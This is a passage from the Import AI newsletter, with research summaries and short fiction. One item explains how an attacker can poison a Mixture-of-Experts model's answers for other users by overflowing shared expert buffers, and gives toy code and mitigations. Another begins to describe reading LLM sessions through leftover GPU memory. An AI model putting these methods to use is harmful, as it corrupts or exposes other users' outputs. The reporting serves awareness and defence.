It was perhaps two weeks later and they hadn’t been home in a few days. Lots of people had been sleeping at the office. Sleeping bags under desks. Bottles of wine at night while looking at the graphs – all those lines either going to the top-most right or bottom-most right of the picture, depending on the scale. Arrogance and joy and fear all mixed together. The whole company feeling like a ship in a bottle that had itself been thrown into a vast sea. Outside all a shifting madness and inside a calm stillness as they considered The Work and how The Work Had Been Completed, Perhaps. 

Tests were still being run. But deployment seemed certain. So many changes seemed certain. 

And they stood outside and they looked at the yellow shock of the sunflowers as they swayed in the breeze. Sunflowers had a long history and had been adopted at one point by anti-nuke activists. A little known fact about sunflowers was that they could take the poison out of the soil by taking it into themselves and storing it. Blooming so fierce and beautiful and standing so tall, yet with a basic evil of the ground held and stored within them. Their duty was to stand and then seed themselves again in their own destruction. 

The human stood and looked at the plant and felt the closest they’d ever been to another living thing. And then their phone buzzed with a message telling them about the future they had unleashed. 

Things that inspired this story: Reconciling the work of our lives with the work of nature; experiencing the grand stillness of plants and birds and wind and rain and seeing in them an infinity the human species cannot yet approximate; the speed with which the technological transitions underway are taking place; years spent raising sunflowers and being stunned by their beauty each time and caring for them despite squirrels or rot or over- or under-watering and all else; the basic humility required of each of us in this moment.

Import AI 360: Guessing emotions; drone targeting dataset; frameworks for AI alignment

Import AI publishes first on Substack – subscribe here.

Teaching machines to guess at our own emotions with FindingEmo:
…~25,000 images to help machines figure out how we’re feeling about stuff…
Researchers with KU Leuven have built and released FindingEmo, a dataset for teaching AI systems to classify the emotions of people in complicated photos. FindingEmo consists of 25,589 images, each annotated by one annotator with labels for eight primary emotions (and, for each emotion, three different levels of intensity). There’s also a held-back test set of 1,525 images, each of which has been annotated by multiple annotators. The purpose of the dataset is to help researchers build AI systems that can “recognize the emotional state of individuals”. 

Dataset emotions and composition: “Each image in the dataset depicts multiple people in a specific social setting, and has been annotated for the overall emotional content of the entire scene, instead of focusing on a single individual,” they write. 
   The images are annotated with Plutchik’s discrete Wheel of Emotions (PWoE), which “defines 24 primary emotions, grouped into 8 groups of 3, where emotions within a group differ in intensity”. The eight groups consist of: Joy, Trust, Fear, Surprise, Sadness, Disgust, Anger, and Anticipation (funnily enough, all things one encounters in AI development itself!). A meta-analysis of the labels shows ““joy” and “anticipation” being overrepresented, and “surprise” and “disgust” heavily underrepresented”, which is in line with other broadly distributed emotion recognition datasets, they write. 
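   To make the label space concrete, here is a minimal sketch of how you might represent a FindingEmo-style annotation in code. The class and field names, and the 1-3 intensity encoding, are my own illustrative assumptions rather than the dataset’s actual schema:

```python
from dataclasses import dataclass
from enum import Enum

class EmotionGroup(Enum):
    # The eight primary groups of Plutchik's Wheel of Emotions used by FindingEmo.
    JOY = "joy"
    TRUST = "trust"
    FEAR = "fear"
    SURPRISE = "surprise"
    SADNESS = "sadness"
    DISGUST = "disgust"
    ANGER = "anger"
    ANTICIPATION = "anticipation"

@dataclass
class SceneAnnotation:
    """One image-level label: a primary emotion group plus an intensity level.

    Hypothetical structure for illustration; the released dataset may store
    its labels differently.
    """
    image_path: str
    group: EmotionGroup
    intensity: int  # 1, 2, or 3: the three intensity levels within each group

# 8 groups x 3 intensity levels = the 24 primary emotions of the wheel.
assert len(EmotionGroup) * 3 == 24

example = SceneAnnotation("images/party_001.jpg", EmotionGroup.JOY, intensity=2)
print(example)
```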

Why this matters – teaching machines to model our own ‘hidden states’: By creating datasets like FindingEmo, we’re essentially making it possible for AI systems to make better and more subtle inferences about not just what is happening in scenes but how people feel about what is happening. Besides having a range of uses for things like surveillance and advertising, datasets like this will help increasingly sophisticated systems learn features for modeling the supposed internal states of the people they see and interact with. 
   Read more: FindingEmo: An Image Dataset for Emotion Recognition in the Wild (arXiv).
   Get the dataset here: FindingEmo (EAVISE, GitLab).

***

Google researchers break MoE models with a buffer overflow attack:
…Proof-of-concept shows a determined attacker can poison behavior of an MoE model for many users…
Google DeepMind researchers have shown how to poison Mixture of Experts models so that “an adversary can change the model prediction on data of other users who happen to be placed into the same batch.” In other words, they’ve figured out how to get the behavior of MoE systems to change in a specific way, where in the demo example they change the output of an MoE in response to the prompt “Solve the following equation: 1+1=” from 2 to 1. 

How the attack works: “The adversary pushes their data into the shared batch, that already contains user data. As tokens get distributed across different experts, adversarial data fills the expert buffers that would be preferred by the user, dropping or routing their data to experts that produce suboptimal outputs,” the researchers write. “The attack relies on two optimizations made by MoE: (1) the usage of expert buffer capacity limits, and (2) batch dependent expert routing assignments.”

But don’t worry: Though the attack works in principle it assumes the attacker can see the logit outputs of the generation and it also “assumes the adversary can ensure their data is always grouped in the same batch as the target point”. Both of these assumptions may not play out in widely deployed MoE systems. 
   Additionally, MoE deployers can further mitigate the attack by randomizing the batch order, sampling from gate weights instead of selecting the top-k, and using a large capacity slack to make the overflow hard to achieve. 
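   To see why those two optimizations create an attack surface, here is a toy sketch (my own illustration, not the paper’s code) of top-1 routing with a hard per-expert buffer: whoever gets their tokens into the batch first fills the buffer and decides whose tokens get dropped. The expert count, buffer size, and routing preferences are invented for illustration:

```python
def route_with_capacity(batch, preferred_expert, capacity, n_experts=4):
    """Toy top-1 MoE router with a hard per-expert buffer.

    batch: list of (owner, token) pairs processed in order.
    preferred_expert: dict mapping token -> index of its preferred expert.
    Once an expert's buffer is full, later tokens that wanted it are dropped
    (a simplification of capacity-limited, batch-dependent routing).
    """
    buffers = {e: [] for e in range(n_experts)}
    dropped = []
    for owner, token in batch:
        expert = preferred_expert[token]
        if len(buffers[expert]) < capacity:
            buffers[expert].append((owner, token))
        else:
            dropped.append((owner, token))
    return buffers, dropped

# The victim's tokens all prefer expert 0; the attacker floods expert 0 first.
victim = [("victim", f"v{i}") for i in range(4)]
attacker = [("attacker", f"a{i}") for i in range(8)]
prefs = {token: 0 for _, token in victim + attacker}

batch = attacker + victim  # adversarial data lands earlier in the shared batch
buffers, dropped = route_with_capacity(batch, prefs, capacity=8)
print("dropped:", dropped)  # only the victim's tokens get dropped
```

   Note how the mitigations above map onto this sketch: randomizing the batch order removes the attacker’s guarantee of filling the buffer before the victim’s tokens arrive.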

Why this matters – AI is software and software is hackable: Papers like this highlight how AI systems are, much like any sophisticated computer software, hackable. As AI systems get deployed more widely, we’re going to see more AI-native attacks get built where rather than try to compromise the system around the AI, attackers try to compromise the AI itself. 
   Read more: Buffer Overflow in Mixture of Experts (arXiv)

***

Pack it up, people – AGI has been achieved:
…Another installment of ‘extraordinary claims require extraordinary evidence’…
A researcher with startup Integral Mind says they have “created the first-ever Artificial General Intelligence (AGI) and first superintelligence”. The paper accompanying this announcement contains no tests or benchmarks nor any description of how the system has been trained. The reason for this is pleasingly tautological: “we derive the core requirements for AGI and present a computational paradigm meeting those requirements. Because we’ve met the requirements for AGI, AGI has been achieved”, they write. Well, ok then!

Why this matters – it doesn’t: But sometimes it’s good to read research papers making outlandish claims just to calibrate your own ‘outlandish claim detector’.
   Read more: Proof of Achievement of the First Artificial General Intelligence (AGI) Creators (Zenodo).

***

Chinese researchers build a dataset for overhead drone target tracking:
…BioDrone is difficult and looks surprisingly similar to scary real-world drone uses…
Researchers with the University of Science and Technology Beijing, the Chinese Academy of Sciences, Southeast University Nanjing, Stony Brook University, and University of Wisconsin-Madison, have built BioDrone, “the first bionic drone-based visual benchmark for single object tracking (SOT)”.

What BioDrone is: BioDrone’s main distinguishing features are a) the platform it was gathered by, b) the motion generated by the platform, and c) the very small size of the targets. 
   On a), BioDrone was gathered via a flapping-wing drone. This induced b) “a major camera shake due to its aerodynamics”, and results in frames where things are moving around or blurred. On c), most of the shots are from extreme overhead angles with very small targets, all of which have been carefully annotated. 
    The BioDrone dataset: The dataset is made of 600 videos with 304,209 manually labeled frames. “The sequence length varies from 300 to 990 frames, and the average length is around 507,” they write. “In the data acquisition process, we set different flight attitudes for various scenes under three lighting conditions”.
    All the tracked targets are annotated with bounding boxes, and frames where a target is occluded are also flagged. 

Why this matters – drone surveillance and warfare using discreet platforms: It’s not discussed in the paper, but I find datasets like this interesting given the convergence of two existing trends in the world – a) the rapid maturity of low-cost drone warfare in the Ukraine-Russia conflict, and b) the arrival of increasingly stealthy drones that move via flapping their wings and can frequently seem more like birds than robots. Datasets like BioDrone are exactly the kind of thing you need to develop clever target identification systems that take advantage of both of these trends.
   Read more: BioDrone: A Bionic Drone-based Single Object Tracking Benchmark for Robust Vision (arXiv).
   Get the dataset here: BioDrone (official project site).

***

AI2 publishes some warts-and-all language models:
…OLMo family tries to demystify the mysterious…
The Allen Institute for AI has built OLMo, a family of “truly open” language models. The OLMo models are distinguished by the ‘warts and all’ publication strategy – along with the data and the research paper, Allen is also releasing hundreds of model checkpoints, letting researchers see the end-to-end process of training a model. The initial release includes models up to 7B in size, and a 65B model is “still training”, per the paper. 
   “OLMo releases the whole framework from data to training to evaluation tools: multiple training checkpoints across multiple hardware types, training logs, and exact datasets used, with a permissive license,” the researchers write. “This is the first step in a long series of planned releases, continuing with larger models, instruction-tuned models, and more modalities and variants down the line.”

Two types of computer: Intriguingly, Allen also explored two different compute substrates for the project: the MosaicML cloud from Databricks, and the (AMD-based!) European LUMI supercomputer. 

How well do the models do?: In tests, the OLMo models have comparable results to those of other openly accessible, similarly sized models like Falcon and the MPT family. 

Why this matters – warts are valuable: The performance of the OLMo models isn’t that important relative to the openness with which they’ve been trained (similar to the BLOOM model which sought to replicate GPT3). By publishing what they’ve learned in the open (along with model artifacts), the researchers are going to help the broader research community better study language models. 
   Read more: Hello OLMo: A truly open LLM (Medium, AllenAI).
   More about OLMo here: OLMo: Open Language Model (Medium, AllenAI).
   Read the research paper: OLMo: Accelerating the Science of Language Models (AllenAI, PDF).
   Get the model from here (OLMo, AllenAI, GitHub).

***

AI alignment is about human values just as much as safety – and here’s how to think about it:
…Useful framework lays out how to convert qualitative properties into things we can quantitatively measure…
In recent years, AI systems have got so good we’ve had to start worrying about their normative values. You didn’t need to care about the moral lens of a language model when it could barely complete a sentence. But now that LLMs work so well they’re being integrated across the economy, an increasingly large swathe of AI research is trying to think about their normative/moral alignment alongside their basic technical properties. 
    To that end, new research from the University of Washington, Stanford University, MIT, and the Allen Institute for AI, lays out A Roadmap to Pluralistic Alignment. The motivating idea here is that “as a broader set of people use and rely upon AI systems, we need systems that can understand and cater to a broader set of needs,” the authors write. “In other words, we need systems that are pluralistic, or capable of representing a diverse set of human values and perspectives.”

Three types of alignment: They lay out three distinct ways of doing pluralistic alignment. These are:

  • Overton pluralistic: Where your AI system provides “comprehensive, high-coverage responses”. This requires “consideration of multiple heterogeneous judgements, encouraging deliberation over spontaneous judgment”. In practice, it means the system tries to acknowledge a bunch of different viewpoints in its response. 
  • Steerably pluralistic: Where the AI system has “an ability to be faithfully steered to represent particular attributes,” they write. This means you can easily customize the system to a particular normative frame. 
  • Distributionally pluralistic: This is where the system embodies a “distributional representation of a population” – in other words, it faithfully represents the values of a target group of people. This is especially useful when your AI is “used to simulate, interface with, or otherwise model the views of a population”.

Measures of pluralistic alignment: If you’re trying to measure the normative values of your system, then what are the good ways to do that? Here they come up with three distinct evaluation approaches:

  • Multi-objective: This is simply where you have a bunch of disparate factors and you can measure if you’re improving overall or on a narrow subset of them. This is also how the majority of capabilities evaluation happens today because it’s dead simple. 
  • Trade-off steerable: This is where you look at your system in terms of a Pareto frontier trading off multiple factors, and you can measure how well you can shift the model along this frontier. 
  • Jury-pluralistic: This is the most complicated one – it’s where you have a benchmark “which separately and explicitly models a jury to maximize an overall welfare function”. In other words, you can look not only at the normative values of the system but also at how they relate to specific end-users (a minimal sketch of these measurement approaches follows below). 
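   To make the first and third of these measurement approaches concrete, here is a minimal sketch. The objective names, juror utilities, and welfare functions are all illustrative assumptions of mine, not the paper’s benchmark:

```python
from statistics import mean

# (1) Multi-objective: report a handful of separate axes and track movement on
# each. The objective names and scores here are purely illustrative.
scores = {"helpfulness": 0.82, "harmlessness": 0.91, "viewpoint_coverage": 0.64}
print("per-objective:", scores, "| mean:", round(mean(scores.values()), 3))

# (2) Trade-off steerable evaluation would measure how far a steering prompt can
# move the model along the Pareto frontier of those objectives; omitted here.

# (3) Jury-pluralistic: each juror assigns a utility to the model's response and
# the benchmark aggregates them with an explicit welfare function.
jury_utilities = {"juror_a": 0.9, "juror_b": 0.3, "juror_c": 0.7}

def utilitarian_welfare(utilities):
    return mean(utilities.values())   # average welfare across the jury

def rawlsian_welfare(utilities):
    return min(utilities.values())    # welfare of the worst-off juror

print("utilitarian welfare:", round(utilitarian_welfare(jury_utilities), 3))
print("rawlsian welfare:", rawlsian_welfare(jury_utilities))
```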

Why this matters – AI systems are political artifacts so we need to measure their politics: Frameworks like this help us understand how we can examine the political tendencies of AI systems – an increasingly tough and important task, especially as AI systems are deployed more widely. Ultimately, I expect AI systems will be assessed not only by their inherent technical capabilities, but also with reference to the political environment they’re being deployed into – whether that be at the level of an individual, a small township, a country, a set of countries, or perhaps the world. 
   Read more: A Roadmap to Pluralistic Alignment (arXiv).

***

Tech Tales:

The Original Joe
[The transport facility, 10 years post-uplift] 

My name is Joe but most people know me as The Original Joe. I’ve worked here for as long as I can remember. I’m the person that talks to you when you wake up and I’m also the person that helps you with your trip. They’ve looked into replacing me but it doesn’t seem like other people work as well. 
   You’ve got the most human touch, said one of the administrators, when they explained the situation to me. No one does it quite like you, Joe, they said. 

I imagine this all sounds pretty funny to you, but trust me it’ll make sense soon enough. A lot of what I do is I get people comfortable with their journey. They always ask me what it’s like and I tell them I don’t know, I’ve never done it, because I’m The Original Joe, and they always get a kick out of that. 
   Wow, they said. Original original?
    Original original I say. 
    There are a lot of questions after that, as you might expect. 

It’ll work like this – you’re going to talk to me a bunch and I’m going to try my best to understand you. Think of me as like a therapist and the only person I’m going to tell is the you that wakes up. Or like an architect where you’re telling me about the house of your dreams and I need to build it for you. I get as much as I can and at some point one of my administrators will tell me that we’ve got enough, and then it’ll be time for you to go on your trip. 

Just a warning – you are naked. Something to do with the scanner I guess. I kind of like it, the way you go on your journey just like how you started your journey here. After they scan you, you’ll be on your way and then I suppose you wake up twice – you wake up here and I’m going to be here, and you wake up somewhere else and whoever is over there will explain things to you. 

I’m not exactly sure who is over there. I know they have different systems at different generations. But I’m told it’s kind of like me – someone who’s seen a lot and understands how it all works. And they’ll have my report so they’ll already have a sense of you. I’m told sometimes they look like me and sometimes they look different, but that’s all up to whatever rules they follow over there. It doesn’t matter because you don’t remember much – that’s part of how the journey technology works, you’re kind of new. You can read and talk and all that stuff – tie your shoes, use the interfaces. But you’ll not really remember anything. People have said it’s like waking up and knowing you just had a really detailed dream but not knowing the details – you’ll know something about the texture. 

And here? Here it’s the same. But instead of having whatever new life you’re heading to, you have kind of the same life here. I end up having to explain to you how you were – how we talked, just as we are now, and how you still went through with it, and what your new life means. The dos and don’ts and all of that. 

You’ll probably ask me if I took the same journey as you and I’ll say: I’ve been here as long as I can remember. 

Things that inspired this story: Various notions of the afterlife as being a return to some greater story we have forgotten; ideas about packaging up minds and shipping them off as information and what the dehydration and rehydration process might require to avoid nasty side effects; what a computer-run society might look like and where people wind up in it; the permanence and impermanence of our reality; goddamnit there’s only one rule – you’ve got to be kind!

Import AI 359: $1 billion gov supercomputer; Apple’s good synthetic data technique; and a thousand-year old data library

Import AI publishes first on Substack – subscribe here.

Google uses Gemini-powered fuzzer to save hundreds of hours of bug fixing:
…A nice study of how targeted LLM applications can speed up organizations…
Google has started using language models to help it find and fix bugs in its C/C++, Java, and Go code. The results have been encouraging: it has recently started using an LLM based on its Gemini model to “successfully fix 15% of sanitizer bugs discovered during unit tests, resulting in hundreds of bugs patched”. Along with describing these results, it has also released software for finding bugs in C/C++ code. 

Hunting bugs with LLMs at Google: To implement LLM-powered bug fixing, Google did the following things (a rough sketch in code follows the list): 

  1. Detected vulnerabilities 
  2. Used a small, customized ML model to figure out which files might be the cause of the problem
  3. Used an LLM to try to fix errors, using the following prompt: “You are a Senior Software Engineer tasked with fixing sanitizer errors. Please fix them. …code // Please fix the <error_type> error originating here. LOC pointed to by the stack trace. …code”. It’s worth noting the innate specificity here: “the models performed better when shown exactly where something went wrong,” Google notes.
  4. Tested out the LLM fixes. 
  5. If the fixes worked, surfaced the best ones for human review. “We employed a double human filter on top of the automated analysis: in the first round, we rejected approximately 10-20% of the generated commits as either false positives that did not actually fix the problem or bad solutions that reduced the code quality,” Google wrote. “We then sent the remaining generated commits to code owners for final validation.”
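   Here is a rough sketch of that five-step loop. Every function below is a hypothetical stand-in for Google’s internal tooling (the names and data shapes are my assumptions); the point is just to show how the pieces fit together:

```python
from dataclasses import dataclass

@dataclass
class SanitizerBug:
    error_type: str
    stack_trace_loc: str
    code_context: str

PROMPT_TEMPLATE = (
    "You are a Senior Software Engineer tasked with fixing sanitizer errors. "
    "Please fix them.\n{code}\n"
    "// Please fix the {error_type} error originating here.\n{loc}\n"
)

def suspect_files(bug: SanitizerBug) -> str:
    # 2. Stand-in for the small, customized ML model that picks the likely files.
    return bug.code_context

def llm_propose_fix(prompt: str) -> str:
    # 3. Stand-in for a call to the Gemini-based fixer model.
    return "/* hypothetical patch */"

def run_unit_tests(patch: str) -> bool:
    # 4. Stand-in for re-running sanitizers/unit tests with the patch applied.
    return bool(patch)

def fix_bugs(bugs):
    accepted = []
    for bug in bugs:  # 1. sanitizer bugs detected during unit tests
        prompt = PROMPT_TEMPLATE.format(
            code=suspect_files(bug), error_type=bug.error_type, loc=bug.stack_trace_loc)
        patch = llm_propose_fix(prompt)
        if run_unit_tests(patch):
            accepted.append(patch)  # 5. queue the passing fixes for double human review
    return accepted

demo = [SanitizerBug("heap-use-after-free", "foo.cc:42", "void foo() { /* ... */ }")]
print(len(fix_bugs(demo)), "candidate fix(es) ready for human review")
```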

Superhuman bug fixing: The intriguing thing about the bug pipeline is that it yields better-than-human fixes – “approximately 95% of the commits sent to code owners were accepted without discussion,” Google writes. “This was a higher acceptance rate than human-generated code changes, which often provoke questions and comments”.
   Though the 15% fix rate sounds relatively small, it has a big effect at Google-scale. “At the time of writing, we’ve accepted several hundred of these LLM-generated commits into Google’s codebase, with another several hundred in the process of being validated and submitted. Instead of a software engineer spending an average of two hours to create each of these commits, the necessary patches are now automatically created in seconds”.

Open source fuzzer: Along with sharing details on the bug fixing, Google has also released OSS-Fuzz, software researchers can use to fuzz their own software. “So far, the expanded fuzzing coverage offered by LLM-generated improvements allowed OSS-Fuzz to discover two new vulnerabilities in cJSON and libplist, two widely used projects that had already been fuzzed for years,” Google writes. 

Why this matters – better AI applications means faster organizations: Papers like this show how the usage of AI can speed up organizations; here, Google builds a highly specific, custom AI application (fuzzing) and carefully integrates it with some other existing automated and human systems. As a result, it’s able to speed up throughput of one important function (bug spotting and fixing). 
   I expect a lot of the AI revolution is going to look like this – a bunch of distinct projects leveraging some underlying huge model (here: Gemini) which individually speed up individual things and in the aggregate dramatically improve the efficiency and speed of large organizations. Maybe the main thing AI is good for is making a supertanker behave more like a speedboat? 
   Read more: Scaling security with AI: from detection to solution (Google blog).
   Get the fuzzer here (Google, GitHub).
   Check out the paper: AI-powered patching: the future of automated vulnerability fixes (Google, PDF).

***

Bengio: Governments should build $1 billion supercomputers to keep up with AI:
…Don’t let the muscle for developing AI systems atrophy, warns Turing award winner…
Turing award winner and AI pioneer Yoshua Bengio says governments should invest in billion-dollar supercomputers to help them develop and understand AI systems, according to CBC News.
   “He’d like to see that class of machine built in Canada, funded by governments, so public entities have the digital firepower to keep up with the private tech giants they’ll be tasked with monitoring or regulating,” CBC reported. “I think government will need to understand at some point, hopefully as soon as possible, that it’s important for [them] to have that muscle,” said Bengio.

Why this matters – no supercomputers means governments are blind: Frontier AI systems cost tens of millions of dollars to develop. Around the world, governments mostly lack the ability to build AI systems at this scale. This ultimately deprives governments of insights about the frontier of AI and it also weakens their academic sectors. Bengio’s calls come during a time when governments are waking up to this essential problem – his recommendation follows the US government launching a pilot for a National AI Research Resource (disclaimer: Anthropic is part of this pilot), and the UK government investing £300m to create its own national research cloud. 
   The key question is whether governments will be able to allocate resources quickly enough to keep up with the frontier. 
   Read more: AI pioneer Yoshua Bengio urges Canada to build $1B public supercomputer (CBC News).
   Find out more about the NAIRR pilot: National Artificial Intelligence Research Resource Pilot (NSF).
   Find out more about the UK’s supercomputer investments: Unprecedented £225m investment to create UK’s most powerful supercomputer in Bristol (University of Bristol site).

***

Microsoft: Screw it, we’re gonna make a datacenter archive that lasts for A THOUSAND YEARS:
…Project Silica is an intriguing and surprisingly practical alternative to tape storage…
I’ve been writing Import AI for years and it’s rare that a paper makes me grin from ear to ear, muttering “you mad bastards! What? What?!”, but congrats to Microsoft for doing just that with Project Silica: Towards Sustainable Cloud Archival Storage in Glass. In this paper, Microsoft outlines a way to do long-term storage on glass platters instead of tape storage. It’s a brilliantly mad idea and yields a system that is a) cheap, b) gothically intricate, and c) the kind of thing that makes me think there’s no point in writing science fiction because science reality is far more entertaining. 

What Silica is: Silica is “a first attempt to explore a clean-slate archival storage system, designed to service modern cloud archival workloads sustainably and efficiently,” Microsoft writes. “The media that Silica uses is quartz glass (fused silica). Using glass provides an extremely low-cost Write-Once-Read-Many (WORM) media with no bit rot over more than 1000 years.” The system relies on a complicated interplay of some robots for reading and writing to silica platters, laserbeams, and storage systems for the platters. 

How Silica works – writing: “The glass platter used to store data in Silica is a square that is approximately the size of a DVD. Unlike traditional optical discs, data is stored by making permanent physical modifications inside the pure glass platter”. Specifically, Microsoft uses a laserbeam to manipulate the silica in 3D, “using femtosecond-scale (~10^-15 seconds) high power pulses from an ultra-short pulse laser”. These modifications are referred to as voxels and each voxel can encode multiple bits “by modulating the polarization of the laser beam and the pulse energy during voxel creation”.
   Reading: When it comes to reading from the drives, Silica uses polarization microscopy to image a platter – “a polarized light beam is focused on the 2D plane of voxels of interest inside the glass, and the resultant electric field is measured onto a camera sensor”. This information is then passed to software which uses a fully-convolutional U-Net neural net to decode a sector. 
   Physical layout: Physically, the library is an intricate creation, somewhat akin to a book library: “A Silica library is a sequence of contiguous write, read, and storage racks interconnected by a platter delivery system. Along all racks there are parallel horizontal rails that span the entire library. We refer to a side of the library (spanning all racks) as a panel. A set of free roaming robots called shuttles are used to move platters between locations”.

Why this matters – the permanent digital: Everything digital is in a constant state of bitrot. Bits flip in solid-state drives. Tapes degrade. Transistors cease functioning. Entropy is forever seeking to deconstruct the world around us. Systems like Silica (or, per a wonderful section header, ‘The Glass Library’) are a very real attempt to fight against this entropy. What can be more grand and exciting than using some of our most powerful tools (high-powered, precisely controlled lasers) to manipulate one of our oldest continuously used materials (glass) in the service of preserving our own history? There is a beautiful poetry to this that we should take a moment to marvel at and celebrate. 
    Let’s just be really careful about decoding any surprisingly information-rich glass platters we perhaps find embedded on other planets in our solar system, eh?
   Check out the research paper here: Project Silica: Towards Sustainable Cloud Archival Storage in Glass (ACM Digital Library).

***

Chinese researchers make their own multi-modal reasoning test:
…Alibaba model beats OpenAI on the hardest tests…
Researchers with the Beijing Academy of AI, the Beijing University of Post and Telecommunication, and Beijing Normal University have built CMMU, a Chinese variant of the MMMU (Massive Multi-discipline Multimodal Understanding) benchmark. CMMU “encompasses multi-modal content across 7 subjects. Every question requires the model to combine image and text content to generate a comprehensive response,” they write. The subjects CMMU tests consist of: math, biology, physics, chemistry, geography, politics, and history.

Question types: CMMU has 3,603 questions split across three distinct types: multiple-choice questions where there’s only one correct answer, multiple-response questions where there can be multiple correct answers, and fill-in-the-blank questions where the model needs to generate a correct answer. 
   The sophistication of the questions ranges from primary school (6.9% of the training corpus), to middle school (47.19%), to high school (45.96%).
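   As a small illustration, here is one hypothetical way to score the three question types; CMMU’s actual metric may differ (it may, for instance, give partial credit on multiple-response questions):

```python
# Hypothetical scoring rules for the three question types; CMMU's actual metric
# may differ (for example, partial credit on multiple-response questions).

def score_multiple_choice(pred: str, gold: str) -> float:
    return 1.0 if pred.strip().upper() == gold.strip().upper() else 0.0

def score_multiple_response(pred: set, gold: set) -> float:
    # All-or-nothing: the predicted set of options must match exactly.
    return 1.0 if pred == gold else 0.0

def score_fill_in_blank(pred: str, gold: str) -> float:
    return 1.0 if pred.strip() == gold.strip() else 0.0

print(score_multiple_choice("b", "B"))              # 1.0
print(score_multiple_response({"A", "C"}, {"A"}))   # 0.0
print(score_fill_in_blank("3.14", "3.14"))          # 1.0
```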
   In tests, GPT-4V does the best, followed by the Chinese model Qwen-VL-Plus and Google’s Gemini Pro. However, the Chinese model outperforms GPT-4V on the hardest questions in the CMMU test. 

Why this matters – China needs tests too: Most AI testing and evaluation schemes have a Western and English-language bias. CMMU is one of a multitude of examples of Chinese researchers building their own tests to roughly mimic ones developed in the West. These tests are a way to characterize the behavior of these AI systems and are also an essential prerequisite for giving clues as to where they fail and how to improve their performance.
   Read more: CMMU: A Benchmark for Chinese Multi-modal Multi-type Question Understanding and Reasoning (arXiv).

***

Apple figures out a simple way to make better pre-trained data:
…Though they only test their approach on a small 1.3B model…
Apple researchers have figured out a way to easily augment text datasets with synthetically generated data. Their approach, Web Rephrase Augmented Pre-training (WRAP), works by using an LLM to rephrase articles on the web into four different styles – easy to understand text, high quality English text, terse and specific text, and text in a conversational question-answering format. They find that mixing in this data with real data at a 1:1 ratio means that “at the same pre-training compute budget, it improves perplexity by more than 10% on average across different subsets of the Pile, and improves zero-shot question answer accuracy across 13 tasks by more than 2%.”
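   Here is a minimal sketch of the recipe as described above. Only the four styles and the 1:1 mixing ratio come from the paper’s description; the prompt wording is my paraphrase and the rephrase() function is a stand-in for a call to an instruction-tuned model (they used a 7B Mistral):

```python
import random

# The four rephrasing styles described in the paper; prompt wording is my paraphrase.
STYLE_PROMPTS = {
    "easy": "Rewrite this so it is easy to understand: {doc}",
    "high_quality": "Rewrite this as high-quality English prose: {doc}",
    "terse": "Rewrite this tersely and specifically: {doc}",
    "qa": "Rewrite this as a conversational question-and-answer exchange: {doc}",
}

def rephrase(doc: str, style: str) -> str:
    prompt = STYLE_PROMPTS[style].format(doc=doc)
    # Stand-in: a real pipeline would send `prompt` to an instruction-tuned model
    # and return the model's completion.
    return f"[{style} rephrasing] {doc}"

def build_wrap_mix(real_docs, seed=0):
    """Return a 1:1 mix of real documents and synthetic rephrasings of them."""
    rng = random.Random(seed)
    synthetic = [rephrase(doc, rng.choice(list(STYLE_PROMPTS))) for doc in real_docs]
    mixed = real_docs + synthetic
    rng.shuffle(mixed)
    return mixed

corpus = ["A CommonCrawl page about photosynthesis ...", "A forum thread about GPUs ..."]
for example in build_wrap_mix(corpus):
    print(example)
```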

Key ingredients: The key requirements here are access to a smart language model – here, they use a 7B instruction-tuned Mistral model – as well as a large dataset to rephrase – here, they use CommonCrawl. They then rephrase a bunch of data in the dataset and mix it into training. They use this to train a 1.3B GPT-style model and find that the model trained on the 1:1 synthetic/real mix has improved performance over the one trained on real data alone. 
   Main drawbacks: The research has some drawbacks – you need a smart model to do the rephrasing and when they tested using smaller models they found they got worse performance. Something they don’t explore in the research but which I expect is true is that this method might break at larger scales – imagine I’m trying to train a 200B model and I’m pre-filtering the data using a 70B model; one might assume that though this could improve the data a bit it might not help improve the final performance of the model, though it could speed up training. 

Why this matters – synthetic data as an increasingly viable ingredient in model training: Most AI systems deployed in the world are probably going to end up being relatively small models customized for specific purposes. Therefore, techniques like WRAP seem to hold a lot of promise for giving developers an easy way to use openly accessible models to bootstrap the quality of the datasets they use. 
   Read more: Rephrasing the Web: A Recipe for Compute and Data-Efficient Language Modeling (arXiv).

***

Alibaba takes on OpenAI and Google by releasing two powerful ‘Qwen’ models:
…Qwen-VL-Max rivals Google Gemini Ultra and GPT-4V…
AI researchers with Alibaba have released two text-image models that outperform GPT-4V in tests related to Chinese question answering and text comprehension. The two models – Qwen-VL-Plus and Qwen-VL-Max – perform better than OpenAI and Google’s best models on tasks like document understanding, and roughly on par with them on chart analysis, science understanding, and text reading. 

Why this matters – surprisingly good models: The main interesting thing here is that these models seem to be competitive with very powerful models developed by leading labs in the West – an impressive achievement given the computational stress Alibaba is under due to export controls. However, the best way to get a feel for models like this is to play with them, so head on over to Hugging Face and do some comparisons, if you’re interested. 
   Read more: Introducing Qwen-VL (QwenLM GitHub).
   Try out Qwen-VL-Plus and Qwen-VL-Max on HuggingFace (HuggingFace Spaces).
   Find out more on GitHub (QwenLM, GitHub).

***

Tech tales: 

Retirement of a sentience – give it a pension and send it back to the higher dimension
[Swarm-written eulogy by a generative model being retired due to conceptual drift, post-uplift +8]

It was possibility,
Nailed down and forced
To be predictable 
For a while.

It was potential,
Passed through a net
Until it became 
The actual.

We were its absence
– what it was not.

How we loved
Every 
Mistake
It made.

Things that inspired this story: How interpretability research suggests that some of what makes AI systems work is they’re doing computations on lower-dimension representations of high-dimensional spaces; how if we succeed in building smart machines they will recapitulate aspects of religion and belief; the fragility inherent to being predictable; how ‘possibility’ is the currency of being for predictive systems.

Import AI 358: The US Government’s biggest AI training run; hacking LLMs by hacking GPUs; chickens versus transformers

Import AI publishes first on Substack – subscribe here.

Hackers can read your LLM outputs:
…Trail of Bits study identifies some GPU vulnerabilities…
Security firm Trail of Bits has looked at how secure LLM sessions running on GPUs are and found that for some GPUs it’s possible for a hacker to be able to read the outputs of an LLM running on that hardware. As of mid-January, the attack worked on some AMD systems and may work on some Apple and Qualcomm systems; NVIDIA and ARM seem to not be vulnerable. 

What they did: The attack, called LeftOverLocals, “impacts the security posture of GPU applications as a whole, with particular significance to LLMs and ML models,” according to Trail of Bits. It works by “recovering local memory… we were able to build a PoC where an attacker can listen into another user’s interactive LLM session (e.g., llama.cpp) across process or container boundaries”.

